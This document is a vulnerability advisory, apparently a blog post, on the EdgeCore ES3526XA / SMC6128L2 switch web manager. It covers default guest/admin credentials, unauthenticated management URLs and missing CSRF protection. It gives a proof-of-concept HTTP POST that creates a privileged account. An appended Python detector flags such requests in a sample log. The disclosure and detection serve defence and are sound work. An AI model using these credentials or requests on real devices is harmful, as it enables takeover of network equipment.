Friday, June 24, 2016

EdgeCore - ES3526XA Manager - Multiple Vulnerabilities

EdgeCore - Layer2+ Fast Ethernet Standalone Switch ES3526XA Manager - Multiple Vulnerabilities

Also rebranded as: SMC TigerSwitch 10/100 SMC6128L2 Manager

Confirmed versions

Object ID:

Switch Information 
Main Board:
Number of Ports 26
Hardware Version R01
Management Software:
Loader Version
Boot-ROM Version
Operation Code Version

Object ID:

Switch Information 
Main Board:
Number of Ports 28
Hardware Version R01
Chip Device ID Marvell 98DX106-B0, 88E6095[F]
Internal Power Status Active

Management Software:
EPLD Version 0.07
Loader Version
Boot-ROM Version
Operation Code Version
Role Master

Other firmware / software versions may also be affected.

Vendor Response: These models are no longer supported.

Vulnerability Details

1. Weak Credentials Management

Guest/guest - privilege level 0 - read access to most of the device configuration
Admin/admin - privilege level 15 - read/write access

The application does not enforce a mandatory password change for these default accounts.

2. Access Control Flaws

Any function can be performed by calling its URL directly (GET/POST) without any authentication. This includes creating new privileged users, changing (admin) passwords, deleting users, reading or changing the device configuration, rebooting the device, etc.

+ The guest account can also perform any administrative function, such as adding, updating and deleting users.

PoC 1:
For example, anyone can access these URLs directly, without any authentication:


PoC 2:
Create a new privileged account:

POST /config/153/user_accounts.htm HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://IP/config/153/user_accounts.htm
Cookie: expires=Fri, 1 Jan 2016 01:33:07 GMT
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 166


The application does not enforce access control correctly on any of these functions.

3. Vulnerable to Cross-Site Request Forgery

No CSRF token is generated per page or per (sensitive) function. Successful exploitation of this vulnerability allows silent execution of unauthorized actions on the device, such as a password change, configuration parameter changes, saving the modified configuration, and a device reboot.
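The three issues above (default credentials, unauthenticated or guest-level access to the management pages, and forgeable state-changing POSTs) can be spotted in traffic captured in front of the switch. The following Python script is an added example, not part of the original advisory or of the vendor's software: it runs over a small constructed request log (the pipe-separated format, the 192.0.2.10 device address and the third credential are assumptions for the example) and flags requests that use the default accounts, reach /config/ pages without credentials, or POST to them with an absent or foreign Referer.

```python
import base64
from typing import Optional
from urllib.parse import urlparse

DEVICE_HOST = "192.0.2.10"            # assumed address of the switch
SENSITIVE_PREFIX = "/config/"         # management pages, e.g. /config/153/user_accounts.htm
DEFAULT_CREDS = {("guest", "guest"), ("admin", "admin")}   # default accounts named in the advisory


def basic(user: str, pw: str) -> str:
    """Build a Basic Authorization header value (used to construct sample data)."""
    return "Basic " + base64.b64encode(f"{user}:{pw}".encode()).decode()


# Constructed sample log, one request per line: METHOD | PATH | REFERER | AUTHORIZATION
# ('-' marks an absent header). Not the switch's own log format.
SAMPLE_LOG = "\n".join([
    f"POST | /config/153/user_accounts.htm | http://{DEVICE_HOST}/config/153/user_accounts.htm | Basic Z3Vlc3Q6Z3Vlc3Q=",
    "GET | /config/153/user_accounts.htm | - | -",
    f"POST | /config/153/user_accounts.htm | http://attacker.example/page.html | {basic('admin', 'admin')}",
    f"GET | /status.htm | http://{DEVICE_HOST}/ | {basic('admin', 'Unique-Passw0rd')}",
])


def decode_basic(auth: str) -> Optional[tuple]:
    """Return (user, password) from a 'Basic <base64>' header value, else None."""
    if not auth.startswith("Basic "):
        return None
    try:
        user, _, pw = base64.b64decode(auth[6:], validate=True).decode().partition(":")
    except (ValueError, UnicodeDecodeError):
        return None
    return (user, pw)


def analyze(log: str) -> list:
    """Return (line_number, reason) for every request matching one of the three patterns."""
    findings = []
    for n, line in enumerate(log.splitlines(), 1):
        method, path, referer, auth = (f.strip() for f in line.split("|"))
        creds = decode_basic(auth)
        if creds in DEFAULT_CREDS:
            findings.append((n, f"default credential {creds[0]}:{creds[1]}"))
        if path.startswith(SENSITIVE_PREFIX) and auth == "-":
            findings.append((n, "config page requested without credentials"))
        if method == "POST" and path.startswith(SENSITIVE_PREFIX):
            # A state-changing POST whose Referer is missing or points elsewhere is the CSRF shape.
            if referer == "-" or urlparse(referer).hostname != DEVICE_HOST:
                findings.append((n, "config POST with absent or foreign Referer"))
    return findings


if __name__ == "__main__":
    for line_no, reason in analyze(SAMPLE_LOG):
        print(f"line {line_no}: {reason}")
```

A mitigation on the device side, since these models are unsupported, is to reach the management interface only through an isolated management VLAN or a fronting proxy that enforces its own authentication and rejects cross-origin POSTs.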

